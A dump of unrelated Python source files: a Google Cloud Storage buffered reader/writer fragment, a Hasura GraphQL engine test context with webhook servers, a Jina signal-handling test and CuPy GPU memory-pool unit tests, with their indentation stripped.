# Reinitialize download objects.
self.download_stream = cStringIO.StringIO()
self.downloader = transfer.Download(
self.download_stream, auto_transfer=False,
chunksize=self.buffer_size)
self.client.objects.Get(self.get_request, download=self.downloader)
continue
if exn:
logging.error(
('Exception while fetching %d bytes from position %d of %s: '
'%s\n%s'),
bytes_to_request, self.position, self.path, exn, tb)
raise exn
self.buffer = result
return
raise GcsIOError(
'Reached retry limit for _fetch_next_if_buffer_exhausted.')
def _fetch_to_queue(self, queue, func, args):
try:
value = func(*args)
queue.put((value, None, None))
except Exception as e: # pylint: disable=broad-except
tb = traceback.format_exc()
queue.put((None, e, tb))
def _remaining(self):
return self.size - self.position
def close(self):
"""Close the current GCS file."""
self.closed = True
self.download_stream = None
self.downloader = None
self.buffer = None
def _get_segment(self, start, size):
"""Get the given segment of the current GCS file."""
if size == 0:
return ''
# The objects self.downloader and self.download_stream may be recreated if
# this call times out; we save them locally to avoid any threading issues.
downloader = self.downloader
download_stream = self.download_stream
end = start + size - 1
downloader.GetRange(start, end)
value = download_stream.getvalue()
# Clear the cStringIO object after we've read its contents.
download_stream.truncate(0)
assert len(value) == size
return value
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
def seek(self, offset, whence=os.SEEK_SET):
"""Set the file's current offset.
Note if the new offset is out of bound, it is adjusted to either 0 or EOF.
Args:
offset: seek offset as number.
whence: seek mode. Supported modes are os.SEEK_SET (absolute seek),
os.SEEK_CUR (seek relative to the current position), and os.SEEK_END
(seek relative to the end, offset should be negative).
Raises:
IOError: When this buffer is closed.
ValueError: When whence is invalid.
"""
self._check_open()
self.buffer = ''
self.buffer_start_position = -1
if whence == os.SEEK_SET:
self.position = offset
elif whence == os.SEEK_CUR:
self.position += offset
elif whence == os.SEEK_END:
self.position = self.size + offset
else:
raise ValueError('Whence mode %r is invalid.' % whence)
self.position = min(self.position, self.size)
self.position = max(self.position, 0)
def tell(self):
"""Tell the file's current offset.
Returns:
current offset in reading this file.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
return self.position
def _check_open(self):
if self.closed:
raise IOError('Buffer is closed.')
def seekable(self):
return True
def readable(self):
return True
def writable(self):
return False
# TODO: Consider using cStringIO instead of buffers and data_lists when reading
# and writing.
class GcsBufferedWriter(object):
"""A class for writing Google Cloud Storage files."""
class PipeStream(object):
"""A class that presents a pipe connection as a readable stream."""
def __init__(self, recv_pipe):
self.conn = recv_pipe
self.closed = False
self.position = 0
self.remaining = ''
def read(self, size):
"""Read data from the wrapped pipe connection.
Args:
size: Number of bytes to read. Actual number of bytes read is always
equal to size unless EOF is reached.
Returns:
data read as str.
"""
data_list = []
bytes_read = 0
while bytes_read < size:
bytes_from_remaining = min(size - bytes_read, len(self.remaining))
data_list.append(self.remaining[0:bytes_from_remaining])
self.remaining = self.remaining[bytes_from_remaining:]
self.position += bytes_from_remaining
bytes_read += bytes_from_remaining
if not self.remaining:
try:
self.remaining = self.conn.recv_bytes()
except EOFError:
break
return ''.join(data_list)
def tell(self):
"""Tell the file's current offset.
Returns:
current offset in reading this file.
Raises:
IOError: When this stream is closed.
"""
self._check_open()
return self.position
def seek(self, offset, whence=os.SEEK_SET):
# The apitools.base.py.transfer.Upload class insists on seeking to the end
# of a stream to do a check before completing an upload, so we must have
# this no-op method here in that case.
if whence == os.SEEK_END and offset == 0:
return
elif whence == os.SEEK_SET and offset == self.position:
return
raise NotImplementedError
def _check_open(self):
if self.closed:
raise IOError('Stream is closed.')
def __init__(self,
client,
path,
mode='w',
mime_type='application/octet-stream'):
self.client = client
self.path = path
self.mode = mode
self.bucket, self.name = parse_gcs_path(path)
self.closed = False
self.position = 0
# A small buffer to avoid CPU-heavy per-write pipe calls.
self.write_buffer = bytearray()
self.write_buffer_size = 128 * 1024
# Set up communication with uploading thread.
parent_conn, child_conn = multiprocessing.Pipe()
self.child_conn = child_conn
self.conn = parent_conn
# Set up uploader.
self.insert_request = (storage.StorageObjectsInsertRequest(
bucket=self.bucket, name=self.name))
self.upload = transfer.Upload(
GcsBufferedWriter.PipeStream(child_conn),
mime_type,
chunksize=WRITE_CHUNK_SIZE)
self.upload.strategy = transfer.RESUMABLE_UPLOAD
# Start uploading thread.
self.upload_thread = threading.Thread(target=self._start_upload)
self.upload_thread.daemon = True
self.upload_thread.last_error = None
self.upload_thread.start()
# TODO(silviuc): Refactor so that retry logic can be applied.
# There is retry logic in the underlying transfer library but we should make
# it more explicit so we can control the retry parameters.
@retry.no_retries # Using no_retries marks this as an integration point.
def _start_upload(self):
# This starts the uploader thread. We are forced to run the uploader in
# another thread because the apitools uploader insists on taking a stream
# as input. Happily, this also means we get asynchronous I/O to GCS.
#
# The uploader by default transfers data in chunks of 1024 * 1024 bytes at
# a time, buffering writes until that size is reached.
try:
self.client.objects.Insert(self.insert_request, upload=self.upload)
except Exception as e: # pylint: disable=broad-except
logging.error('Error in _start_upload while inserting file %s: %s',
self.path, traceback.format_exc())
self.upload_thread.last_error = e
finally:
self.child_conn.close()
def write(self, data):
"""Write data to a GCS file.
Args:
data: data to write as str.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
if not data:
return
self.write_buffer.extend(data)
if len(self.write_buffer) > self.write_buffer_size:
self._flush_write_buffer()
self.position += len(data)
def flush(self):
"""Flushes any internal buffer to the underlying GCS file."""
self._check_open()
self._flush_write_buffer()
def tell(self):
"""Return the total number of bytes passed to write() so far."""
return self.position
def close(self):
"""Close the current GCS file."""
if self.closed:
logging.warn('Channel for %s is not open.', self.path)
return
self._flush_write_buffer()
self.closed = True
self.conn.close()
self.upload_thread.join()
# Check for exception since the last _flush_write_buffer() call.
if self.upload_thread.last_error:
raise self.upload_thread.last_error # pylint: disable=raising-bad-type
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
def _check_open(self):
if self.closed:
raise IOError('Buffer is closed.')
def seekable(self):
return False
def readable(self):
return False
def writable(self):
return True
def _flush_write_buffer(self):
try:
self.conn.send_bytes(buffer(self.write_buffer))
self.write_buffer = bytearray()
except IOError:
if self.upload_thread.last_error:
raise self.upload_thread.last_error # pylint: disable=raising-bad-type
else:
raise
|
context.py
|
#!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a solution to this we are going to store it in PyTestConf.config
class PytestConf():
pass
class HGECtxError(Exception):
pass
class GQLWsClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
self.ws_active_query_ids.discard( frame.get('id') )
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
#Do init If headers are provided
self.init(headers)
elif not self.init_done:
self.init()
if query_id == None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
if json_msg.get('type') == 'stop':
#Remove from active queries list
self.ws_active_query_ids.discard( query_id )
if not query_id in self.ws_id_query_queues:
self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
#Put event in the correponding query_queue
self.ws_id_query_queues[query_id].put(json_msg)
elif json_msg['type'] != 'ka':
#Put event in the main queue
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
elif req_path == "/get-user-by-email":
resp, status = self.get_users_by_email(True)
self._send_response(status, resp)
elif req_path == "/get-users-by-email":
resp, status = self.get_users_by_email(False)
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
for input in inputs:
email_address = input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
def get_users_by_email(self, singleUser = False):
email = self.req_json['input']['email']
if not self.check_email(email):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
query get_user($email:String!) {
user(where:{email:{_eq:$email}},order_by: {id: asc}) {
id
}
}
'''
query = {
'query': gql_query,
'variables':{
'email':email
}
}
code,resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
if singleUser:
return resp['data']['user'][0], HTTPStatus.OK
else:
return resp['data']['user'], HTTPStatus.OK
def check_email(self, email):
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
return re.search(regex,email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.log_request(status)
self.send_response_only(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_short":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_long":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
self.resp_queue = queue.Queue(maxsize=1)
self.error_queue = queue.Queue()
super().__init__(server_address, EvtsWebhookHandler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
def get_error_queue_size(self):
sz = 0
while not self.error_queue.empty():
self.error_queue.get()
sz = sz + 1
return sz
def is_queue_empty(self):
return self.resp_queue.empty
def teardown(self):
self.evt_trggr_httpd.shutdown()
self.evt_trggr_httpd.server_close()
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.evt_trggr_web_server.join()
class HGECtxGQLServer:
def __init__(self, hge_urls, port=5000):
# start the graphql server
self.port = port
self._hge_urls = hge_urls
self.is_running = False
self.start_server()
def start_server(self):
if not self.is_running:
self.graphql_server = graphql_server.create_server('127.0.0.1', self.port)
self.hge_urls = graphql_server.set_hge_urls(self._hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
self.is_running = True
def teardown(self):
self.stop_server()
def stop_server(self):
if self.is_running:
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.is_running = False
class HGECtx:
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self.hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
if self.hge_jwt_conf is not None:
self.hge_jwt_conf_dict = json.loads(self.hge_jwt_conf)
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.ws_client = GQLWsClient(self, '/v1/graphql')
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
st_code, resp = self.v1q_f('queries/clear_db.yaml')
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
def anyq(self, u, q, h):
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
def v1q(self, q, headers = {}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + "/v1/query",
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
def teardown(self):
self.http.close()
self.engine.dispose()
|
test_runtime_captures_signals.py
|
import multiprocessing
import os
import signal
import time
import pytest
from cli.api import gateway, executor_native
from jina import Executor, DocumentArray, Document, requests
from jina.clients.request import request_generator
from jina.parsers import set_gateway_parser, set_pod_parser
from jina.serve.networking import GrpcConnectionPool
class DummyExecutor(Executor):
def __init__(self, dir=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.dir = dir
self.request_count = 0
@requests
def slow_count(self, **kwargs):
time.sleep(0.5)
self.request_count += 1
def close(self):
super().close()
with open(f'{self.dir}/test.txt', 'w') as fp:
fp.write(f'proper close;{self.request_count}')
def _create_test_data_message():
req = list(
request_generator(
'/', DocumentArray([Document(text='input document') for _ in range(10)])
)
)[0]
return req
@pytest.mark.parametrize('signal', [signal.SIGTERM, signal.SIGINT])
def test_executor_runtimes(signal, tmpdir):
import time
args = set_pod_parser().parse_args([])
def run(args):
args.uses = {
'jtype': 'DummyExecutor',
'with': {'dir': str(tmpdir)},
'metas': {'workspace': str(tmpdir)},
}
executor_native(args)
process = multiprocessing.Process(target=run, args=(args,))
process.start()
time.sleep(0.5)
GrpcConnectionPool.send_request_sync(
_create_test_data_message(), target=f'{args.host}:{args.port_in}'
)
time.sleep(0.1)
os.kill(process.pid, signal)
process.join()
with open(f'{tmpdir}/test.txt', 'r') as fp:
output = fp.read()
split = output.split(';')
assert split[0] == 'proper close'
assert split[1] == '1'
@pytest.mark.parametrize('signal', [signal.SIGTERM, signal.SIGINT])
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_gateway(signal, protocol):
import time
def run():
args = set_gateway_parser().parse_args(
[
'--protocol',
protocol,
'--graph-description',
'{}',
'--deployments-addresses',
'{}',
]
)
gateway(args)
process = multiprocessing.Process(target=run)
process.start()
time.sleep(0.5)
os.kill(process.pid, signal)
process.join()
|
test_memory.py
|
import ctypes
import gc
import pickle
import threading
import unittest
import fastrlock
import cupy.cuda
from cupy.cuda import device
from cupy.cuda import memory
from cupy.cuda import stream as stream_module
from cupy import testing
class MockMemory(memory.Memory):
cur_ptr = 1
def __init__(self, size):
self.ptr = MockMemory.cur_ptr
MockMemory.cur_ptr += size
self.size = size
self.device_id = 0
def __del__(self):
self.ptr = 0
pass
def mock_alloc(size):
mem = MockMemory(size)
return memory.MemoryPointer(mem, 0)
class TestUnownedMemoryClass(unittest.TestCase):
def test_inherits_base_memory(self):
assert issubclass(memory.UnownedMemory, memory.BaseMemory)
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
'specify_device_id': [True, False],
}))
@testing.gpu
class TestUnownedMemory(unittest.TestCase):
def check(self, device_id):
if (cupy.cuda.runtime.is_hip
and self.allocator is memory.malloc_managed):
raise unittest.SkipTest('HIP does not support managed memory')
size = 24
shape = (2, 3)
dtype = cupy.float32
with device.Device(device_id):
src_mem_ptr = self.allocator(size)
src_ptr = src_mem_ptr.ptr
args = (src_ptr, size, src_mem_ptr)
kwargs = {}
if self.specify_device_id:
kwargs = {'device_id': device_id}
unowned_mem = memory.UnownedMemory(*args, **kwargs)
assert unowned_mem.size == size
assert unowned_mem.ptr == src_ptr
assert unowned_mem.device_id == device_id
arr = cupy.ndarray(shape, dtype, memory.MemoryPointer(unowned_mem, 0))
# Delete the source object
del src_mem_ptr
with device.Device(device_id):
arr[:] = 2
assert (arr == 2).all()
def test_device0(self):
self.check(0)
@testing.multi_gpu(2)
def test_device1(self):
self.check(1)
@testing.gpu
class TestMemoryPointer(unittest.TestCase):
def test_int(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(1)
assert pval == int(memptr)
def test_add(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8)
memptr2 = memptr + 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval + 4 == int(memptr2)
memptr3 = 4 + memptr
assert isinstance(memptr3, memory.MemoryPointer)
assert pval + 4 == int(memptr3)
memptr += 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval + 4 == int(memptr)
def test_sub(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8) + 4
memptr2 = memptr - 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval == int(memptr2)
memptr -= 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval == int(memptr)
def test_copy_to_and_from_host(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_memset(self):
a_gpu = memory.alloc(4)
a_gpu.memset(1, 4)
a_cpu = ctypes.c_ubyte()
for i in range(4):
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 1)
assert a_cpu.value == 1
a_gpu += 1
# -----------------------------------------------------------------------------
# Memory pool
@testing.gpu
class TestSingleDeviceMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.SingleDeviceMemoryPool(allocator=mock_alloc)
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ptr = self.stream.ptr
def test_round_size(self):
assert memory._round_size(self.unit - 1) == self.unit
assert memory._round_size(self.unit) == self.unit
assert memory._round_size(self.unit + 1) == self.unit * 2
def test_bin_index_from_size(self):
assert memory._bin_index_from_size(self.unit - 1) == 0
assert memory._bin_index_from_size(self.unit) == 0
assert memory._bin_index_from_size(self.unit + 1) == 1
def test_split(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ptr)
tail = chunk.split(self.unit * 2)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit * 2
assert chunk.prev is None
assert chunk.next.ptr() == tail.ptr()
assert chunk.stream_ptr == self.stream_ptr
assert tail.ptr() == mem.ptr + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit * 2
assert tail.prev.ptr() == chunk.ptr()
assert tail.next is None
assert tail.stream_ptr == self.stream_ptr
tail_of_head = chunk.split(self.unit)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit
assert chunk.prev is None
assert chunk.next.ptr() == tail_of_head.ptr()
assert chunk.stream_ptr == self.stream_ptr
assert tail_of_head.ptr() == mem.ptr + self.unit
assert tail_of_head.offset == self.unit
assert tail_of_head.size == self.unit
assert tail_of_head.prev.ptr() == chunk.ptr()
assert tail_of_head.next.ptr() == tail.ptr()
assert tail_of_head.stream_ptr == self.stream_ptr
tail_of_tail = tail.split(self.unit)
assert tail.ptr() == chunk.ptr() + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit
assert tail.prev.ptr() == tail_of_head.ptr()
assert tail.next.ptr() == tail_of_tail.ptr()
assert tail.stream_ptr == self.stream_ptr
assert tail_of_tail.ptr() == mem.ptr + self.unit * 3
assert tail_of_tail.offset == self.unit * 3
assert tail_of_tail.size == self.unit
assert tail_of_tail.prev.ptr() == tail.ptr()
assert tail_of_tail.next is None
assert tail_of_tail.stream_ptr == self.stream_ptr
def test_merge(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ptr)
chunk_ptr = chunk.ptr()
chunk_offset = chunk.offset
chunk_size = chunk.size
tail = chunk.split(self.unit * 2)
head = chunk
head_ptr = head.ptr()
head_offset = head.offset
head_size = head.size
tail_ptr = tail.ptr()
tail_offset = tail.offset
tail_size = tail.size
tail_of_head = head.split(self.unit)
tail_of_tail = tail.split(self.unit)
head.merge(tail_of_head)
assert head.ptr() == head_ptr
assert head.offset == head_offset
assert head.size == head_size
assert head.prev is None
assert head.next.ptr() == tail_ptr
assert head.stream_ptr == self.stream_ptr
tail.merge(tail_of_tail)
assert tail.ptr() == tail_ptr
assert tail.offset == tail_offset
assert tail.size == tail_size
assert tail.prev.ptr() == head_ptr
assert tail.next is None
assert tail.stream_ptr == self.stream_ptr
head.merge(tail)
assert head.ptr() == chunk_ptr
assert head.offset == chunk_offset
assert head.size == chunk_size
assert head.prev is None
assert head.next is None
assert head.stream_ptr == self.stream_ptr
def test_alloc(self):
p1 = self.pool.malloc(self.unit * 4)
p2 = self.pool.malloc(self.unit * 4)
p3 = self.pool.malloc(self.unit * 8)
assert p1.ptr != p2.ptr
assert p1.ptr != p3.ptr
assert p2.ptr != p3.ptr
def test_alloc_split(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
assert ptr + self.unit * 2 == tail.ptr
def test_alloc_limit(self):
self.pool.set_limit(size=(self.unit * 6))
p1 = self.pool.malloc(self.unit * 5)
p2 = self.pool.malloc(self.unit * 1)
with self.assertRaises(memory.OutOfMemoryError):
self.pool.malloc(self.unit)
self.pool.set_limit(size=(self.unit * 7))
p3 = self.pool.malloc(self.unit)
del p1, p2, p3
def test_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 == p2.ptr
def test_free_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_free_merge(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
# merge head into tail
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del tail
del head
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
